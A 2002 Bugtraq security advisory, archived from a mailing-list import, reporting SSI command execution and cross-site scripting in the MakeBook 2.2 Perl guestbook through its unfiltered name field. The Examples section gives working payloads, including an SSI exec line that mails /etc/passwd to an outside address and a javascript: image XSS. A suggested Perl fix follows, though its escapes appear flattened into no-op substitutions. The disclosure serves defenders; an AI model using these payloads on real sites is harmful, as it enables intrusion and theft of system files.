linux, säkerhet

8586974 2002-06-12 07:22 +0000  /111 rader/ DownBload <downbload@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-06-12  16:55  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22589>
Ärende: SSI & CSS execution in MakeBook 2.2
------------------------------------------------------------
From: DownBload <downbload@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <20020612072206.29312.qmail@mail.securityfocus.com>



      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5							
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html				
Date: 12.6.2002							
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload						
Mail me @: downbload@hotmail.com					




------[ Overview 							 

"...MakeBook v2.2 is a simple program which can be used as a
guestbook, an ongoing writing project where each person adds to an
ongoing story, a comment board, or even a way to let people add
comments to many individual pages.  It allows a user to enter their
name, email address, and some text which will then be added to the
"bookfile".  Originally intended for use in writing a continuing
story or journal, where different students could add to the story as
they went along, it has evolved into a more flexible system which
allows the owner to choose how the "book" entries should appear, and
even what pages they appear  on..."


				   

------[ Problem  							
	
Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse.
It works fine, but troubles comes when you look for security measures
in  program. When you want to sign guestbook, you have to write your
name, email address, and some text. Script does remove 'some'
special-char in  $text, but script doesn't replace special-chars in
$name at all, and  because of that, it is possible instead of name,
enter and execute some SSI(Server Side Includes) or CSS(Cross Site
Scripting) code.  'Buggy' code: ...  $name =$data{"Name"}; $email
=$data{"Email"}; $text =$data{"Text"}; $text =~ s/</</g; $text =~
s/>/>/g; ...




------[ Examples

SSI attack
~~~~~~~~~~
Name: <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~~~~~~~~~
Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.




------[ Solution 

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{"Name"};
$name  =~ s/</</g;
$name  =~ s/>/>/g;

$email = $data{"Email"};
$email =~ s/</</g;
$email =~ s/>/>/g;

$text = $data{"Text"};
$text =~ s/</</g;
$text =~ s/>/>/g;
...




------[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.
(8586974) /DownBload <downbload@hotmail.com>/(Ombruten)